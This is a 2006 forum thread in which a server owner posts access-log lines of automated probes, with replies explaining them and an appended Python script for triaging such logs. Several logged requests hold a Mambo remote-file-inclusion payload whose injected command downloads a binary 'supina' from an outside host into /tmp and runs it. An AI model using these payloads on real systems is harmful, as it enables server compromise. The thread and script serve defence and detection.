The Community Forums

scanning my web server

Discussion in 'General Discussion' started by laverdir, Feb 26, 2006.

  1. laverdir

    laverdir Registered

    I know that you cPanel guys are searching for illegal users, but 'brute force' scanning of every IP address isn't the way. An apology will be fine!

    69.93.35.178 - - [26/Feb/2006:08:02:38 -0600] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./supina;echo%20YYY;echo| HTTP/1.1" 404 298
    69.93.35.178 - - [26/Feb/2006:08:02:39 -0600] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./supina;echo%20YYY;echo| HTTP/1.1" 200 586
    69.93.35.178 - - [26/Feb/2006:08:02:40 -0600] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./supina;echo%20YYY;echo| HTTP/1.1" 404 304
    69.93.35.178 - - [26/Feb/2006:08:02:41 -0600] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./supina;echo%20YYY;echo| HTTP/1.1" 404 302
    69.93.35.178 - - [26/Feb/2006:08:02:42 -0600] "GET /articles/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./supina;echo%20YYY;echo| HTTP/1.1" 404 313
    69.93.35.178 - - [26/Feb/2006:08:02:44 -0600] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./supina;echo%20YYY;echo| HTTP/1.1" 404 308
    69.93.35.178 - - [26/Feb/2006:08:02:46 -0600] "POST /xmlrpc.php HTTP/1.1" 404 298
    69.93.35.178 - - [26/Feb/2006:08:02:47 -0600] "POST /blog/xmlrpc.php HTTP/1.1" 404 303
    69.93.35.178 - - [26/Feb/2006:08:02:48 -0600] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 310
    69.93.35.178 - - [26/Feb/2006:08:02:50 -0600] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 311
    69.93.35.178 - - [26/Feb/2006:08:02:51 -0600] "POST /drupal/xmlrpc.php HTTP/1.1" 404 305
    69.93.35.178 - - [26/Feb/2006:08:02:52 -0600] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 311
    69.93.35.178 - - [26/Feb/2006:08:02:53 -0600] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 308
    69.93.35.178 - - [26/Feb/2006:08:02:55 -0600] "POST /xmlrpc.php HTTP/1.1" 404 298
    69.93.35.178 - - [26/Feb/2006:08:02:56 -0600] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 305
    69.93.35.178 - - [26/Feb/2006:08:02:57 -0600] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 305
     
  2. rustelekom

    rustelekom Well-Known Member
    PartnerNOC

    It is the virus. Virus scan your servers for vulnerabilities.
     
  3. AndyReed

    AndyReed Well-Known Member
    PartnerNOC

    The most important thing is securing your server.
     
    #3 AndyReed, Feb 26, 2006
    Last edited: Feb 26, 2006
  4. laverdir

    laverdir Registered

  5. AndyReed

    AndyReed Well-Known Member
    PartnerNOC

  6. laverdir

    laverdir Registered

    I don't think that is related; I have entered the IP address in my browser.

    But it could be related to the famous 'DNS poisoning'...
     
  7. dave9000

    dave9000 Well-Known Member

    It's attempts to exploit various PHP scripts. If that is the only IP you have been hit from, consider yourself lucky. We get hit an average of 5-10 times an hour with basically the same thing.

    You need to secure your server like Andy said. If you're running Apache, then mod_security would be a good addition.

    These exploit attempts did not come from www.cpanel.net.
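
Added example, not part of any post in this thread: a small triage script for access logs like the one posted above. It groups remote-include probes (a parameter whose value is a remote URL, as with `mosConfig_absolute_path`) and `xmlrpc.php` POST probes per client, and singles out probes that got a 2xx answer. The function name, report keys and sample lines are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Common Log Format: host ident user [time] "METHOD target PROTO" status size
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>.*) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\S+)$'
)
# A parameter whose value is a remote URL: the remote-file-inclusion shape.
# Heuristic only: legitimate redirect/callback parameters can match as well.
REMOTE_INCLUDE_RE = re.compile(r'[?&]([\w\[\]]+)=(?:https?|ftp)://', re.I)

def triage(lines):
    """Return {client_ip: {"rfi": [...], "xmlrpc": [...], "answered_2xx": [...]}}."""
    report = defaultdict(lambda: {"rfi": [], "xmlrpc": [], "answered_2xx": []})
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # not a CLF line; skipped rather than guessed at
        target = unquote(m["target"])  # decode %20, %3A ... before matching
        path = target.split("?", 1)[0]
        hit = None
        inc = REMOTE_INCLUDE_RE.search(target)
        if inc:
            hit = "rfi"
            report[m["ip"]]["rfi"].append((path, inc.group(1)))
        elif m["method"] == "POST" and path.endswith("/xmlrpc.php"):
            hit = "xmlrpc"
            report[m["ip"]]["xmlrpc"].append(path)
        # A 2xx on a probe means the script exists and ran: review that one first.
        if hit and m["status"].startswith("2"):
            report[m["ip"]]["answered_2xx"].append((m["ts"], path))
    return dict(report)

# Constructed sample lines (documentation addresses, not taken from the thread)
SAMPLE = [
    '192.0.2.10 - - [26/Feb/2006:08:02:38 -0600] "GET /index2.php?option=com_content&mosConfig_absolute_path=http://198.51.100.7/c.gif?&cmd=id HTTP/1.1" 404 298',
    '192.0.2.10 - - [26/Feb/2006:08:02:39 -0600] "GET /index.php?option=com_content&mosConfig_absolute_path=http%3A%2F%2F198.51.100.7/c.gif?&cmd=id HTTP/1.1" 200 586',
    '192.0.2.10 - - [26/Feb/2006:08:02:46 -0600] "POST /xmlrpc.php HTTP/1.1" 404 298',
    '192.0.2.10 - - [26/Feb/2006:08:02:47 -0600] "POST /blog/xmlrpc.php HTTP/1.1" 404 303',
    '203.0.113.5 - - [26/Feb/2006:08:03:10 -0600] "GET /index.php?option=com_content&id=3 HTTP/1.1" 200 4120',
]

if __name__ == "__main__":
    for ip, found in triage(SAMPLE).items():
        print(ip, found)
```

A 2xx on a probed path is not proof of compromise, only that the request reached a real script; check that application's version and look in `/tmp` and the web root for files created around that timestamp.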
     